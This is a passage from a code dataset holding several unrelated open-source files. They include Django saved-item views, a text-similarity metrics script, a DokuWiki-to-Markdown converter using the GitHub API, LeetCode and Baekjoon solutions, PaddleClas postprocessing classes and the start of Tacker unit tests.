verify_token(serializer.validated_data[\"refresh\"]):\n return Response({\"error\": \"Token is invalid or has expired\"}, status=\"400\")\n id=active_jwt.user.id\n book_custom_user = Book.saved_by.through\n books = book_custom_user.objects.filter(customuser_id=id)\n data = []\n for book in books:\n print(book.book_id)\n book_object = Book.objects.get(pk=book.book_id)\n book_serializer = BookSerializer(book_object)\n data.append(book_serializer.data)\n return Response(data)\n\n\nclass VerifySavedBook(APIView):\n serializer_class = SaveBookSerializer\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n active_jwt = Jwt.objects.get(refresh=serializer.validated_data[\"refresh\"])\n except Jwt.DoesNotExist:\n return Response({\"error\": \"refresh token not found\"}, status=\"400\")\n\n if not verify_token(serializer.validated_data[\"refresh\"]):\n return Response({\"error\": \"Token is invalid or has expired\"}, status=\"400\")\n id = active_jwt.user.id\n book_id = serializer.validated_data[\"book_id\"]\n book_custom_user = Book.saved_by.through\n book = book_custom_user.objects.filter(book_id=book_id, customuser_id=id)\n print(len(book))\n if (len(book)>=1):\n return Response({\"saved\": 1})\n else:\n return Response({\"saved\": 0})\n\n\nclass VerifySavedVideo(APIView):\n serializer_class = SaveVideoSerializer\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n active_jwt = Jwt.objects.get(refresh=serializer.validated_data[\"refresh\"])\n except Jwt.DoesNotExist:\n return Response({\"error\": \"refresh token not found\"}, status=\"400\")\n\n if not verify_token(serializer.validated_data[\"refresh\"]):\n return Response({\"error\": \"Token is invalid or has expired\"}, status=\"400\")\n id = active_jwt.user.id\n video_id = serializer.validated_data[\"video_id\"]\n video_custom_user = Video.saved_by.through\n video = video_custom_user.objects.filter(video_id=video_id, customuser_id=id)\n print(len(video))\n if (len(video)>=1):\n return Response({\"saved\": 1})\n else:\n return Response({\"saved\": 0})\n\n\n\n\n","repo_name":"Valeriya2022/remote_library_api","sub_path":"remote_library_api/remote_library/views/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":9726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15735763672","text":"# https://stackoverflow.com/questions/65199011/is-there-a-way-to-check-similarity-between-two-full-sentences-in-python\n\nimport datetime\nimport os\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Dict\nfrom typing import List\n\nimport nltk\nimport spacy\nimport torch\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom rouge import Rouge\nfrom sacrebleu.metrics import BLEU\nfrom sentence_transformers import SentenceTransformer\nfrom sentence_transformers import util as sentence_transformer_util\nfrom utils import assert_path\nfrom utils import load_json\nfrom utils import save_json\nfrom worker_vs_gpt.config import DATA_DIR\n\n\n# nltk.download(\"punkt\")\n# nltk.download(\"stopwords\")\n\n\n# \"intfloat_e5-base\"\nclass TransformerSimilarity:\n def __init__(\n self, sentence_transformer_model_name: str = \"intfloat/e5-base\"\n ) -> None:\n self.device = torch.device(\"mps\" if torch.backends.mps.is_built() else \"cpu\")\n self.sentence_transformer_model = self.model = SentenceTransformer(\n sentence_transformer_model_name\n ).to(self.device)\n\n def embedding_similarity(self, text1: str, text2: str) -> float:\n text1_embedding: torch.tensor = self.model.encode(\n self._text_to_sentences(text1), convert_to_tensor=True\n )\n text2_embedding: torch.tensor = self.model.encode(\n self._text_to_sentences(text2), convert_to_tensor=True\n )\n\n cosine_scores = sentence_transformer_util.pytorch_cos_sim(\n text1_embedding, text2_embedding\n )\n return cosine_scores.mean().item()\n\n def _text_to_sentences(self, text: str) -> List[str]:\n return nltk.sent_tokenize(text)\n\n\nclass SimilarityScorer:\n def __init__(\n self,\n # spacy_model_name: str = \"en_core_web_lg\",\n ):\n # self.spacy_model = spacy.load(spacy_model_name)\n self.stop_words = set(stopwords.words(\"danish\"))\n self.rouge_scorer = Rouge()\n self.bleu_scorer = BLEU(effective_order=True)\n\n def spacy_cosine_similarity(self, text1: str, text2: str) -> float:\n \"\"\"\n Calculates the similarity between two texts using spacy's word embeddings.\n Similarity is the same whether text1 or text2 is the original text.\n \"\"\"\n # doc_text1 = self.spacy_model(text1)\n # doc_text2 = self.spacy_model(text2)\n # return doc_text1.similarity(doc_text2)\n pass\n\n def vocab_overlap(self, original: str, augmented: str) -> Dict:\n # Tokenize the input strings\n tokens1 = set(word_tokenize(original))\n tokens2 = set(word_tokenize(augmented))\n\n # Remove common English stopwords\n tokens1 = tokens1 - self.stop_words\n tokens2 = tokens2 - self.stop_words\n\n # Calculate the token overlap\n overlap = len(tokens1.intersection(tokens2))\n\n # Identify new words\n new_words1 = tokens1 - tokens2\n new_words2 = tokens2 - tokens1\n\n # Percentage overlap\n percentage_overlap = overlap / (len(tokens1) + len(tokens2))\n\n return {\n \"token_overlap\": overlap,\n \"percentage_token_overlap\": percentage_overlap,\n \"new_words_in_original\": list(new_words1),\n \"new_words_in_augmented\": list(new_words2),\n }\n\n def bleu_score(self, hypothesis: str, reference: str) -> float:\n \"\"\"\n Calculates the BLEU score between two strings.\n \"\"\"\n score = self.bleu_scorer.sentence_score(\n hypothesis=hypothesis,\n references=[reference],\n )\n\n return score.score / 100 # sacreBLEU gives the score in percent\n\n def rouge_score(self, hypothesis: str, reference: str) -> float:\n \"\"\"\n Calculates the ROUGE score between two strings.\n \"\"\"\n score = self.rouge_scorer.get_scores(\n hyps=hypothesis,\n refs=reference,\n )\n return score[0][\"rouge-l\"][\"f\"]\n\n\n@dataclass\nclass TextPair:\n original: str\n augmented: str\n target: str\n scorer: SimilarityScorer\n transformer_scorer: TransformerSimilarity\n\n # @property\n # def spacy_cosine_similarity(self) -> float:\n # \"\"\"\n # Calculates the similarity between two texts using spacy's word embeddings.\n # Similarity is the same whether text1 or text2 is the original text.\n # \"\"\"\n # return self.scorer.spacy_cosine_similarity(self.original, self.augmented)\n\n @property\n def vocab_overlap(self) -> Dict:\n return self.scorer.vocab_overlap(self.original, self.augmented)\n\n @property\n def bleu_score(self) -> float:\n return self.scorer.bleu_score(self.original, self.augmented)\n\n @property\n def rouge_score(self) -> float:\n return self.scorer.rouge_score(self.original, self.augmented)\n\n @property\n def transformer_similarity(self) -> float:\n return self.transformer_scorer.embedding_similarity(\n self.original, self.augmented\n )\n\n\ndef calculate_metrics(dataset_name: str = \"crowdflower\", model: str = \"gpt-4\") -> None:\n print(f\"Started process for dataset: {dataset_name}\")\n\n SS = SimilarityScorer()\n TS = TransformerSimilarity()\n\n assert_path(f\"results/{dataset_name}/\")\n\n # Results dictionary\n results: List[Dict] = []\n\n # open the data\n filename: Path = DATA_DIR / f\"{dataset_name}/balanced_{model}_augmented.json\"\n\n # skip if the file already exists\n if os.path.exists(f\"results/{dataset_name}/{model}_similarity.json\"):\n print(f\"!!! Skipping {dataset_name} as the file already exists.\")\n return\n\n text: str = \"h_text\" if dataset_name == \"ten-dim\" else \"text\"\n text: str = \"tweet\" if dataset_name == \"hate-speech\" else \"text\"\n augmented_text: str = (\n \"augmented_tweet\" if dataset_name == \"hate-speech\" else \"augmented_text\"\n )\n\n data: Dict = load_json(filename, verbose=False)\n\n print(f\"# Calculating metrics for {dataset_name}\")\n for i, text_entry in enumerate(data):\n if i % 100 == 0:\n print(\n f\"## {dataset_name} - {i} / {len(data)} @ {datetime.datetime.now().strftime('%H:%M:%S')}\"\n )\n\n tp: TextPair = TextPair(\n original=text_entry[text],\n augmented=text_entry[augmented_text],\n target=text_entry[\"target\"],\n scorer=SS,\n transformer_scorer=TS,\n )\n\n metrics = {\n # \"spacy_cosine_similarity\": tp.spacy_cosine_similarity,\n \"bleu_score\": tp.bleu_score,\n \"rouge_score\": tp.rouge_score,\n \"transformer_similarity\": tp.transformer_similarity,\n \"vocab_overlap\": tp.vocab_overlap,\n }\n\n text_entry[\"metrics\"] = metrics\n results.append(text_entry)\n\n save_json(results, f\"results/{dataset_name}/{model}_similarity.json\")\n return\n\n\nif __name__ == \"__main__\":\n import multiprocessing\n import os\n\n datasets: List[str] = [\n dataset\n for dataset in os.listdir(DATA_DIR)\n # if dataset not in [\".DS_Store\", \"similarity_results\", \"hate-speech\"]\n if dataset in [\"hate-speech\"]\n ]\n\n pool = multiprocessing.Pool(processes=1)\n # Use the pool to run the function in parallel with different parameters\n pool.map(calculate_metrics, datasets)\n\n # Close the pool to release resources\n pool.close()\n pool.join()\n","repo_name":"AGMoller/worker_vs_gpt","sub_path":"src/worker_vs_gpt/augmented_evaluation/similarity.py","file_name":"similarity.py","file_ext":"py","file_size_in_byte":7414,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"5396684024","text":"from __future__ import print_function, unicode_literals\n\nimport codecs\nimport inspect\nimport json\nimport os\nimport re\nfrom general_tools.file_utils import write_file\nfrom general_tools.url_utils import get_languages, join_url_parts, get_url\nfrom converters.common import quiet_print, dokuwiki_to_markdown, ResourceManifest, ResourceManifestEncoder\n\n\nclass TQConverter(object):\n\n tag_re = re.compile(r'\\{\\{tag>.*?\\}\\}', re.UNICODE)\n squiggly_re = re.compile(r'~~(?:DISCUSSION|NOCACHE)~~', re.UNICODE)\n extra_blanks_re = re.compile(r'\\n{3,}', re.UNICODE)\n chapter_link_re = re.compile(r'\\[\\[:en:bible:questions:comprehension:(.*?):home\\|(.*?)\\]\\]', re.UNICODE)\n missing_blank_line_re = re.compile(r'(\\n \\*.*\\n)(__)', re.UNICODE)\n story_num_re = re.compile(r'(Story )#', re.UNICODE)\n navigate_re = re.compile(r'\\[\\[:en:obs:notes:questions:(.*?)\\|\\s*(.*?)\\s*\\]\\]', re.UNICODE)\n navigate2_re = re.compile(r'\\[\\[en/obs/notes/questions/(.*?)\\|\\s*(.*?)\\s*\\]\\]', re.UNICODE)\n\n def __init__(self, lang_code, git_repo, bible_out_dir, obs_out_dir, quiet):\n \"\"\"\n\n :param str|unicode lang_code:\n :param str|unicode git_repo:\n :param str|unicode bible_out_dir:\n :param str|unicode obs_out_dir:\n :param bool quiet:\n \"\"\"\n self.git_repo = git_repo\n self.bible_out_dir = bible_out_dir\n self.obs_out_dir = obs_out_dir\n self.quiet = quiet\n # self.temp_dir = tempfile.mkdtemp()\n\n if 'github' not in git_repo:\n raise Exception('Currently only github repositories are supported.')\n\n # get the language data\n quiet_print(self.quiet, 'Downloading language data...', end=' ')\n langs = get_languages()\n quiet_print(self.quiet, 'finished.')\n\n self.lang_data = next((l for l in langs if l['lc'] == lang_code), '')\n\n if not self.lang_data:\n raise Exception('Information for language \"{0}\" was not found.'.format(lang_code))\n\n # read the github access token\n root_dir = os.path.dirname(os.path.dirname(inspect.stack()[0][1]))\n with codecs.open(os.path.join(root_dir, 'github_api_token'), 'r', 'utf-8-sig') as in_file:\n # read the text from the file\n self.access_token = in_file.read()\n\n def __enter__(self):\n return self\n\n # noinspection PyUnusedLocal\n def __exit__(self, exc_type, exc_val, exc_tb):\n # delete temp files\n # if os.path.isdir(self.temp_dir):\n # shutil.rmtree(self.temp_dir, ignore_errors=True)\n pass\n\n def run(self):\n\n # https:// github.com/Door43/d43-en\n # https://api.github.com/repos/door43/d43-en/contents/obe/kt\n # https://api.github.com/repos/door43/d43-en/contents/obe/other\n lang_code = self.lang_data['lc']\n\n # clean up the git repo url\n if self.git_repo[-4:] == '.git':\n self.git_repo = self.git_repo[:-4]\n\n if self.git_repo[-1:] == '/':\n self.git_repo = self.git_repo[:-1]\n\n # get the source files from the git repository\n base_url = self.git_repo.replace('github.com', 'api.github.com/repos')\n bible_api_url = join_url_parts(base_url, 'contents/bible/questions/comprehension')\n obs_api_url = join_url_parts(base_url, 'contents/obs/notes/questions')\n\n quiet_print(self.quiet, 'Downloading Bible tQ list.')\n bible_list = self.process_api_request(bible_api_url)\n quiet_print(self.quiet, 'Finished downloading Bible tQ list.')\n\n quiet_print(self.quiet, 'Downloading OBS tQ list.')\n obs_list = self.process_api_request(obs_api_url)\n quiet_print(self.quiet, 'Finished downloading OBS tQ list.')\n\n target_dir = os.path.join(self.bible_out_dir, 'content')\n for url in bible_list:\n self.download_bible_file(url, target_dir)\n\n manifest = ResourceManifest('tq', 'translationQuestions')\n manifest.status['checking_level'] = '3'\n manifest.status['version'] = '3'\n manifest.status['checking_entity'] = 'Wycliffe Associates'\n\n manifest.language['slug'] = lang_code\n manifest.language['name'] = self.lang_data['ang']\n manifest.language['dir'] = self.lang_data['ld']\n\n manifest_str = json.dumps(manifest, sort_keys=False, indent=2, cls=ResourceManifestEncoder)\n write_file(os.path.join(self.bible_out_dir, 'manifest.json'), manifest_str)\n\n target_dir = os.path.join(self.obs_out_dir, 'content')\n for url in obs_list:\n self.download_obs_file(url, target_dir)\n\n manifest = ResourceManifest('obs-tq', 'OBS translationQuestions')\n manifest.status['checking_level'] = '3'\n manifest.status['version'] = '3'\n manifest.status['checking_entity'] = 'Wycliffe Associates'\n\n manifest.language['slug'] = lang_code\n manifest.language['name'] = self.lang_data['ang']\n manifest.language['dir'] = self.lang_data['ld']\n\n manifest_str = json.dumps(manifest, sort_keys=False, indent=2, cls=ResourceManifestEncoder)\n write_file(os.path.join(self.obs_out_dir, 'manifest.json'), manifest_str)\n\n def process_api_request(self, url):\n\n quiet_print(self.quiet, ' Getting {0}.'.format(url))\n\n if '?' in url:\n url += '&access_token={0}'.format(self.access_token)\n else:\n url += '?access_token={0}'.format(self.access_token)\n\n # get the directory listing\n items = json.loads(get_url(url))\n\n # collect the files\n file_list = [o['download_url'] for o in items if o['type'] == 'file'\n and o['name'] != 'home.txt'\n and o['name'] != 'sidebar.txt']\n\n # check for sub-directories\n dir_list = [o['url'] for o in items if o['type'] == 'dir']\n\n for sub_dir in dir_list:\n file_list.extend(self.process_api_request(sub_dir))\n\n return file_list\n\n def download_bible_file(self, url_to_download, out_dir):\n\n parts = url_to_download.rsplit('/', 2)\n file_name = parts[2]\n dir_name = parts[1]\n save_as = os.path.join(out_dir, dir_name, file_name.replace('.txt', '.md'))\n if os.path.isfile(save_as):\n quiet_print(self.quiet, 'Skipping {0}.'.format(file_name))\n return\n\n quiet_print(self.quiet, 'Downloading {0}...'.format(url_to_download), end=' ')\n dw_text = get_url(url_to_download)\n\n md_text = dokuwiki_to_markdown(dw_text)\n\n # fix links to chapter list\n # **[[:en:bible:questions:comprehension:1ch:home|Back to 1 Chronicles Chapter List]]**\n md_text = self.chapter_link_re.sub(r'[\\2](./)', md_text)\n\n # remove tags\n md_text = self.tag_re.sub(r'', md_text)\n\n # remove squiggly tags\n md_text = self.squiggly_re.sub(r'', md_text)\n\n # remove extra blank lines\n md_text = self.extra_blanks_re.sub(r'\\n\\n', md_text)\n\n write_file(save_as, md_text)\n quiet_print(self.quiet, 'finished.')\n\n def download_obs_file(self, url_to_download, out_dir):\n\n parts = url_to_download.rsplit('/', 1)\n file_name = parts[1]\n save_as = os.path.join(out_dir, file_name.replace('.txt', '.md'))\n if os.path.isfile(save_as):\n quiet_print(self.quiet, 'Skipping {0}.'.format(file_name))\n return\n\n quiet_print(self.quiet, 'Downloading {0}...'.format(url_to_download), end=' ')\n dw_text = get_url(url_to_download)\n\n md_text = dokuwiki_to_markdown(dw_text)\n\n # fix links to chapter list\n # **[[:en:bible:questions:comprehension:1ch:home|Back to 1 Chronicles Chapter List]]**\n md_text = self.chapter_link_re.sub(r'[\\2](./)', md_text)\n\n # remove tags\n md_text = self.tag_re.sub(r'', md_text)\n\n # remove squiggly tags\n md_text = self.squiggly_re.sub(r'', md_text)\n\n # remove extra blank lines\n md_text = self.extra_blanks_re.sub(r'\\n\\n', md_text)\n\n # insert missing blank line\n md_text = self.missing_blank_line_re.sub(r'\\1\\n\\2', md_text)\n\n # fix story number\n md_text = self.story_num_re.sub(r'\\1', md_text)\n\n # navigation\n md_text = self.navigate_re.sub(r'[\\2](./\\1.md)', md_text)\n md_text = self.navigate2_re.sub(r'[\\2](./\\1.md)', md_text)\n\n write_file(save_as, md_text)\n quiet_print(self.quiet, 'finished.')\n","repo_name":"unfoldingWord-dev/dokuwiki-to-rc","sub_path":"converters/tq_converter.py","file_name":"tq_converter.py","file_ext":"py","file_size_in_byte":8425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7667318497","text":"class Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n dic,length,start = {},0,0\n for i,j in enumerate(s):\n if j in dic:\n sums = dic[j] + 1\n if sums > start:\n start = sums\n num = i - start + 1\n if num > length:\n length = num\n dic[j] = i\n return length\n# Runtime: 60 ms, faster than 76.33% of Python3 online submissions for Longest Substring Without Repeating Characters.\n# Memory Usage: 13.9 MB, less than 55.58% of Python3 online submissions for Longest Substring Without Repeating Characters.\n\nclass Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n char = [0]*128\n left = right = res = 0\n while right < len(s):\n r = s[right]\n char[ord(r)] += 1\n \n while char[ord(r)] > 1:\n l = s[left]\n char[ord(l)] -= 1\n left += 1\n \n res = max(res,right-left+1)\n \n \n right += 1\n return res\n# Runtime: 131 ms, faster than 26.07% of Python3 online submissions for Longest Substring Without Repeating Characters.\n# Memory Usage: 14.3 MB, less than 54.91% of Python3 online submissions for Longest Substring Without Repeating Characters.\n\nclass Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n n = len(s)\n ans = 0\n mp = {}\n i = 0\n for j in range(n):\n if s[j] in mp:\n i = max(mp[s[j]],i)\n \n ans = max(ans,j-i+1)\n mp[s[j]] = j +1\n return ans\n# Runtime: 94 ms, faster than 53.46% of Python3 online submissions for Longest Substring Without Repeating Characters.\n# Memory Usage: 14 MB, less than 97.46% of Python3 online submissions for Longest Substring Without Repeating Characters.\n","repo_name":"Kuehar/LeetCode","sub_path":"Longest Substring Without Repeating Characters.py","file_name":"Longest Substring Without Repeating Characters.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"21827475800","text":"\nclass Memory:\n def __init__(self):\n self.mem = {}\n\n def update_mem(self, user, data):\n if user in self.mem:\n self.mem[user] = self.mem[user].update(data)\n else:\n self.mem[user] = User(user)\n\n def reset(self):\n self.mem = {}\n\n\nclass User:\n\n def __init__(self, name):\n self.name = name\n self.chatbot_interest = False\n self.fav_chatbot = ''\n self.snide = False\n self.chatbot_dislike = False\n\n def update(self, data):\n words = ['chatbot', 'chatbots', 'bot', 'bots']\n words_in_msg = any(x in data for x in words)\n\n if \"don't like\" in data and words_in_msg:\n self.chatbot_dislike = True\n elif 'like' in data and words_in_msg:\n self.chatbot_interest = True\n elif 'favorite' in data and words_in_msg:\n self.fav_chatbot = data.strip().split()[-1]\n elif words_in_msg:\n self.snide = True\n \n\n return self","repo_name":"slin35/personality-driven-bot","sub_path":"memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23445131425","text":"import os\nimport copy\nimport shutil\nfrom functools import partial\nimport importlib\nimport numpy as np\nimport paddle\nimport paddle.nn.functional as F\n\n\ndef build_postprocess(config):\n if config is None:\n return None\n\n mod = importlib.import_module(__name__)\n config = copy.deepcopy(config)\n\n main_indicator = config.pop(\n \"main_indicator\") if \"main_indicator\" in config else None\n main_indicator = main_indicator if main_indicator else \"\"\n\n func_list = []\n for func in config:\n func_list.append(getattr(mod, func)(**config[func]))\n return PostProcesser(func_list, main_indicator)\n\n\nclass PostProcesser(object):\n def __init__(self, func_list, main_indicator=\"Topk\"):\n self.func_list = func_list\n self.main_indicator = main_indicator\n\n def __call__(self, x, image_file=None):\n rtn = None\n for func in self.func_list:\n tmp = func(x, image_file)\n if type(func).__name__ in self.main_indicator:\n rtn = tmp\n return rtn\n\n\nclass ThreshOutput(object):\n def __init__(self, threshold, label_0=\"0\", label_1=\"1\"):\n self.threshold = threshold\n self.label_0 = label_0\n self.label_1 = label_1\n\n def __call__(self, x, file_names=None):\n y = []\n for idx, probs in enumerate(x):\n score = probs[1]\n if score < self.threshold:\n result = {\n \"class_ids\": [0],\n \"scores\": [1 - score],\n \"label_names\": [self.label_0]\n }\n else:\n result = {\n \"class_ids\": [1],\n \"scores\": [score],\n \"label_names\": [self.label_1]\n }\n if file_names is not None:\n result[\"file_name\"] = file_names[idx]\n y.append(result)\n return y\n\n\nclass Topk(object):\n def __init__(self, topk=1, class_id_map_file=None):\n assert isinstance(topk, (int, ))\n self.class_id_map = self.parse_class_id_map(class_id_map_file)\n self.topk = topk\n\n def parse_class_id_map(self, class_id_map_file):\n if class_id_map_file is None:\n return None\n\n if not os.path.exists(class_id_map_file):\n print(\n \"Warning: If want to use your own label_dict, please input legal path!\\nOtherwise label_names will be empty!\"\n )\n return None\n\n try:\n class_id_map = {}\n with open(class_id_map_file, \"r\") as fin:\n lines = fin.readlines()\n for line in lines:\n partition = line.split(\"\\n\")[0].partition(\" \")\n class_id_map[int(partition[0])] = str(partition[-1])\n except Exception as ex:\n print(ex)\n class_id_map = None\n return class_id_map\n\n def __call__(self, x, file_names=None, multilabel=False):\n if file_names is not None:\n assert x.shape[0] == len(file_names)\n y = []\n for idx, probs in enumerate(x):\n index = probs.argsort(axis=0)[-self.topk:][::-1].astype(\n \"int32\") if not multilabel else np.where(\n probs >= 0.5)[0].astype(\"int32\")\n clas_id_list = []\n score_list = []\n label_name_list = []\n for i in index:\n clas_id_list.append(i.item())\n score_list.append(probs[i].item())\n if self.class_id_map is not None:\n label_name_list.append(self.class_id_map[i.item()])\n result = {\n \"class_ids\": clas_id_list,\n \"scores\": np.around(\n score_list, decimals=5).tolist(),\n }\n if file_names is not None:\n result[\"file_name\"] = file_names[idx]\n if label_name_list is not None:\n result[\"label_names\"] = label_name_list\n y.append(result)\n return y\n\n\nclass MultiLabelTopk(Topk):\n def __init__(self, topk=1, class_id_map_file=None):\n super().__init__()\n\n def __call__(self, x, file_names=None):\n return super().__call__(x, file_names, multilabel=True)\n\n\nclass SavePreLabel(object):\n def __init__(self, save_dir):\n if save_dir is None:\n raise Exception(\n \"Please specify save_dir if SavePreLabel specified.\")\n self.save_dir = partial(os.path.join, save_dir)\n\n def __call__(self, x, file_names=None):\n if file_names is None:\n return\n assert x.shape[0] == len(file_names)\n for idx, probs in enumerate(x):\n index = probs.argsort(axis=0)[-1].astype(\"int32\")\n self.save(index, file_names[idx])\n\n def save(self, id, image_file):\n output_dir = self.save_dir(str(id))\n os.makedirs(output_dir, exist_ok=True)\n shutil.copy(image_file, output_dir)\n\n\nclass Binarize(object):\n def __init__(self, method=\"round\"):\n self.method = method\n self.unit = np.array([[128, 64, 32, 16, 8, 4, 2, 1]]).T\n\n def __call__(self, x, file_names=None):\n if self.method == \"round\":\n x = np.round(x + 1).astype(\"uint8\") - 1\n\n if self.method == \"sign\":\n x = ((np.sign(x) + 1) / 2).astype(\"uint8\")\n\n embedding_size = x.shape[1]\n assert embedding_size % 8 == 0, \"The Binary index only support vectors with sizes multiple of 8\"\n\n byte = np.zeros([x.shape[0], embedding_size // 8], dtype=np.uint8)\n for i in range(embedding_size // 8):\n byte[:, i:i + 1] = np.dot(x[:, i * 8:(i + 1) * 8], self.unit)\n\n return byte\n\n\nclass PersonAttribute(object):\n def __init__(self,\n threshold=0.5,\n glasses_threshold=0.3,\n hold_threshold=0.6):\n self.threshold = threshold\n self.glasses_threshold = glasses_threshold\n self.hold_threshold = hold_threshold\n\n def __call__(self, batch_preds, file_names=None):\n # postprocess output of predictor\n age_list = ['AgeLess18', 'Age18-60', 'AgeOver60']\n direct_list = ['Front', 'Side', 'Back']\n bag_list = ['HandBag', 'ShoulderBag', 'Backpack']\n upper_list = ['UpperStride', 'UpperLogo', 'UpperPlaid', 'UpperSplice']\n lower_list = [\n 'LowerStripe', 'LowerPattern', 'LongCoat', 'Trousers', 'Shorts',\n 'Skirt&Dress'\n ]\n batch_res = []\n for res in batch_preds:\n res = res.tolist()\n label_res = []\n # gender \n gender = 'Female' if res[22] > self.threshold else 'Male'\n label_res.append(gender)\n # age\n age = age_list[np.argmax(res[19:22])]\n label_res.append(age)\n # direction \n direction = direct_list[np.argmax(res[23:])]\n label_res.append(direction)\n # glasses\n glasses = 'Glasses: '\n if res[1] > self.glasses_threshold:\n glasses += 'True'\n else:\n glasses += 'False'\n label_res.append(glasses)\n # hat\n hat = 'Hat: '\n if res[0] > self.threshold:\n hat += 'True'\n else:\n hat += 'False'\n label_res.append(hat)\n # hold obj\n hold_obj = 'HoldObjectsInFront: '\n if res[18] > self.hold_threshold:\n hold_obj += 'True'\n else:\n hold_obj += 'False'\n label_res.append(hold_obj)\n # bag\n bag = bag_list[np.argmax(res[15:18])]\n bag_score = res[15 + np.argmax(res[15:18])]\n bag_label = bag if bag_score > self.threshold else 'No bag'\n label_res.append(bag_label)\n # upper\n upper_res = res[4:8]\n upper_label = 'Upper:'\n sleeve = 'LongSleeve' if res[3] > res[2] else 'ShortSleeve'\n upper_label += ' {}'.format(sleeve)\n for i, r in enumerate(upper_res):\n if r > self.threshold:\n upper_label += ' {}'.format(upper_list[i])\n label_res.append(upper_label)\n # lower\n lower_res = res[8:14]\n lower_label = 'Lower: '\n has_lower = False\n for i, l in enumerate(lower_res):\n if l > self.threshold:\n lower_label += ' {}'.format(lower_list[i])\n has_lower = True\n if not has_lower:\n lower_label += ' {}'.format(lower_list[np.argmax(lower_res)])\n\n label_res.append(lower_label)\n # shoe\n shoe = 'Boots' if res[14] > self.threshold else 'No boots'\n label_res.append(shoe)\n\n threshold_list = [0.5] * len(res)\n threshold_list[1] = self.glasses_threshold\n threshold_list[18] = self.hold_threshold\n pred_res = (np.array(res) > np.array(threshold_list)\n ).astype(np.int8).tolist()\n batch_res.append({\"attributes\": label_res, \"output\": pred_res})\n return batch_res\n\n\nclass VehicleAttribute(object):\n def __init__(self, color_threshold=0.5, type_threshold=0.5):\n self.color_threshold = color_threshold\n self.type_threshold = type_threshold\n self.color_list = [\n \"yellow\", \"orange\", \"green\", \"gray\", \"red\", \"blue\", \"white\",\n \"golden\", \"brown\", \"black\"\n ]\n self.type_list = [\n \"sedan\", \"suv\", \"van\", \"hatchback\", \"mpv\", \"pickup\", \"bus\",\n \"truck\", \"estate\"\n ]\n\n def __call__(self, batch_preds, file_names=None):\n # postprocess output of predictor\n batch_res = []\n for res in batch_preds:\n res = res.tolist()\n label_res = []\n color_idx = np.argmax(res[:10])\n type_idx = np.argmax(res[10:])\n if res[color_idx] >= self.color_threshold:\n color_info = f\"Color: ({self.color_list[color_idx]}, prob: {res[color_idx]})\"\n else:\n color_info = \"Color unknown\"\n\n if res[type_idx + 10] >= self.type_threshold:\n type_info = f\"Type: ({self.type_list[type_idx]}, prob: {res[type_idx + 10]})\"\n else:\n type_info = \"Type unknown\"\n\n label_res = f\"{color_info}, {type_info}\"\n\n threshold_list = [self.color_threshold\n ] * 10 + [self.type_threshold] * 9\n pred_res = (np.array(res) > np.array(threshold_list)\n ).astype(np.int8).tolist()\n batch_res.append({\"attributes\": label_res, \"output\": pred_res})\n return batch_res\n","repo_name":"PaddlePaddle/PaddleClas","sub_path":"deploy/python/postprocess.py","file_name":"postprocess.py","file_ext":"py","file_size_in_byte":10773,"program_lang":"python","lang":"en","doc_type":"code","stars":5081,"dataset":"github-code","pt":"3"} +{"seq_id":"3618763583","text":"# 6월 21일\n\n# 1로 만들기\n# https://www.acmicpc.net/problem/1463\n# Dynamic Programming\n\n# 각 수를 만드는 최소의 경우의 수는 아래 점화식\n# d[n] = min(d[n / 3], d[n / 2], d[n - 1]) + 1\n# n/3에서 올 수 있거나, d/2에서 올 수 있거나, d - 1에서 올 수 있기 때문이다.\n# 2에서 n까지 순회하며 체크하면 가장 빠른 최소 횟수로 온 것이기 때문에 가능한 논리\n\n# bottom-up 방식으로 1에서부터 n까지 계산 결과를 통해 d[n]의 최소 회수를 구한다.\n\nn = int(input())\n\nd = [0] * (n + 1)\n\nfor i in range(2, n + 1):\n \n tmp = []\n\n if i % 3 == 0:\n tmp.append(d[i // 3])\n\n if i % 2 == 0:\n tmp.append(d[i // 2])\n \n tmp.append(d[i - 1])\n\n d[i] = min(tmp) + 1\n\nprint(d[n])\n","repo_name":"lee-gyu/happy_algorithm","sub_path":"20_06_June/lee_baekjun_1463.py","file_name":"lee_baekjun_1463.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72360516563","text":"from tacker.tests.unit import base\nfrom tacker.vnfm.infra_drivers.kubernetes.k8s import tosca_kube_object\n\n\nclass TestToscaKubeObject(base.TestCase):\n def setUp(self):\n super(TestToscaKubeObject, self).setUp()\n self.tosca_kube_object = tosca_kube_object.ToscaKubeObject(\n name='name',\n namespace='namespace',\n mapping_ports='mappingports',\n containers=[\n tosca_kube_object.Container(\n name=\"name\")],\n network_name=\"network\",\n mgmt_connection_point=True,\n scaling_object=[\n tosca_kube_object.ScalingObject(\n scale_target_name='scalingname')],\n service_type='servicetype',\n labels={\n 'lable': 'lable'},\n annotations=\"annotations\")\n\n def test_tosca_kube_object(self):\n self.assertEqual('name', self.tosca_kube_object.name)\n self.assertEqual('namespace', self.tosca_kube_object.namespace)\n\n\nclass TestContainerObject(base.TestCase):\n def setUp(self):\n super(TestContainerObject, self).setUp()\n self.container_object = tosca_kube_object.Container(\n name='container',\n num_cpus=1,\n mem_size=\"100MB\",\n image=\"ubuntu\",\n command='command',\n args=['args'],\n ports=['22'],\n config='config'\n )\n\n def test_container_object(self):\n self.assertEqual('container', self.container_object.name)\n self.assertEqual(1, self.container_object.num_cpus)\n 